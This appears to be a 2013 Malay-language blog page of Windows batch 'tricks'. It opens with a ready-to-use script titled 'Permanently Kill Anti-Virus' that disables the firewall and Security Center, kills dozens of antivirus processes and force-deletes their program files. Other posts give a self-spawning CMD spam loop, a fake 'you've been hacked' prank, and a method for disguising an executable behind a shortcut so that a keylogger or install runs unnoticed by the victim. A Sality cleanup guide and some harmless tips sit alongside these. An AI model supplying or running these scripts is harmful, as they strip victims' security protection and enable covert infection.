Wednesday, 27 February 2013

Taskkill for AV


1. Bukak Notepad
2. Tampalkan coding ini didalam notepad
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --
3. Simpan sebagai format .bat

Spamming CMD on your computer.


1. Bukak notepad2. Salin coding ini.
@echo off
:START
start a.bat
3. Simpan sebagai format .bat
4. Bukak fail ini.

Sality


1. Putuskan komputer anda dari jaringan manapun, baik itu LAN maupun internet.
2. Matikan fitur system restore anda selama proses pembersihan virus sality
3. Download Sality Repair disini
4. Extract file SalityRepair dan klik kanan file repair.inf kemudian klik kanan dan klik Install
5. Matikan semua aplikasi yang aktif dan sedang anda buka
6. Download Norman Malware Cleaner
7. Ubah ekstensi Norman Malware Cleaner dari .exe menjadi .cmd agar aplikasi Norman Malware Cleaner tersebut tidak diinfeksi oleh virus sality
8. Lakukan scanning menggunakan Norman Malware Cleaner.cmd (ekstensi .exe sudah anda rubah menjadi .cmd)
9. Restart komputer anda setelah proses cleaning selesai
10. Download FixReg
11. extrack FixReg.rar dan jalankan registri yang ada di folder FixReg
sesuai dengan windows yang anda gunakan.
12. Restart komputer anda.
13. Periksa task managerm regedit dsb untuk memastikan komputer anda sudah sembuh. Anda juga bisa melakukan scanning pada safe mode untuk memastikan komputer anda sudah benar – benar bersih dari virus sality.

Sebenarnya sudah hampir semua antivirus sudah bisa mendeteksi dan membasmi virus sality ini. Anda bisa mengupdate antivirus anda dan lakukan scanning serta repair menggunakan antivirus yang anda gunakan. Jika antivirus anda ternyata tidak mampu membasminya, maka tips membasmi virus sality secara manual diatas bisa menjadi solusi ampuh terbebas dari serangan W32Sality.AE

Shortcut for shutdown.


1. Tekan Kiri Mouse Di-desktop > Pilih New > Shortcut
2. Taip [shutdown -s -t 01] tanpa kurungan.3. Bagi nama shortcut anda mengikut kegemaran.
4. Tekan " Finish"

Mengubah Icon Shortcut.
1. Tekan Kiri Mouse Di-shortcut yang telah diebuat dan pilih properties.
2. Pilih " Change Icon " dan akan keluar amaran dan tekan " OK"
3. Pilih icon pilihan anda dan tekan " OK "
 1. Tekan Kiri Mouse Di-desktop > Pilih New > Shortcut
2. Taip [shutdown -s -t 01] tanpa kurungan.3. Bagi nama shortcut anda mengikut kegemaran.
4. Tekan " Finish"

Mengubah Icon Shortcut.
1. Tekan Kiri Mouse Di-shortcut yang telah diebuat dan pilih properties.
2. Pilih " Change Icon " dan akan keluar amaran dan tekan " OK"
3. Pilih icon pilihan anda dan tekan " OK "

Notepad coding


1. Menggunakan Notepad sebagai diari anda

- Taipkan .LOG
- Simpan sebagai LOG.txt
- Tuliskan apa sahaja dalamnya dan ia akan disimpan dengan masa apabila anda menyuntingnya (edit) semula.

2. Matrix Notepad

@echo off
color 2
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Simpan sebagai Matrix.bat dan klik padanya.

3. Membuka DVD Drive

Set oWMP = CreateObject(“WMPlayer.OCX.7?)

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop
Salin kod di atas dan simpan sebagai 'namayangandasuka.vbs'.

4. Prank Hacked Virus

@ECHO off

:Begin

msg * Hell-O..

msg * Kenal aku?

msg * Oh.. Kenal?

msg * Baguslah begitu, ok?

msg * Sebab kau dah kena hack! LOL!

GOTO BEGIN
Salin kod diatas ke dalam notepad dan simpankannya sebagai 'namayangandasuka.bat'.

5. Infinite Notepad

@ECHO off

:top

START %SystemRoot%system32notepad.exe

GOTO top
Simpan sebagai 'namayangandasuka.bat'.

False linking on shortcut


Antara cara untuk mengaktifkan prank / virus yang memerlukan install / keylogger tanpa diketahui mangsa.

Contoh , kita mempunyai " Setup Adobe"1. Buat " Shortcut di desktop"
2. Tukar kan format setup " exe " kepada " txt "
3. Tukar target "shortcut" anda kepada ( contoh : C:\WINDOWS\system32\cmd /c adb.txt ) tanpa kurungan
4. Tukar icon "shortcut" anda agar kelihatan tidak mencurigakan.

External RAM trick..


1. Masukkan pendrive pada port USB..

(Pendrive mestilah bersaiz 1GB..kalau 4GB lebih baik)


2. Klik kanan pada 'My Computer'..


3. Klik 'Properties'..


4. Klik 'Advanced'..


5. Klik 'Settings' pada bahagian 'Performance'


6. Klik 'Advanced'..


7. Klik 'Change' pada 'Virtual Memory'..


8. Pilih memori yang ada pada pendrive anda..


9. Tetapkan nilai yang anda ingini dan klik 'OK'..


10. Restart PC anda..selesai!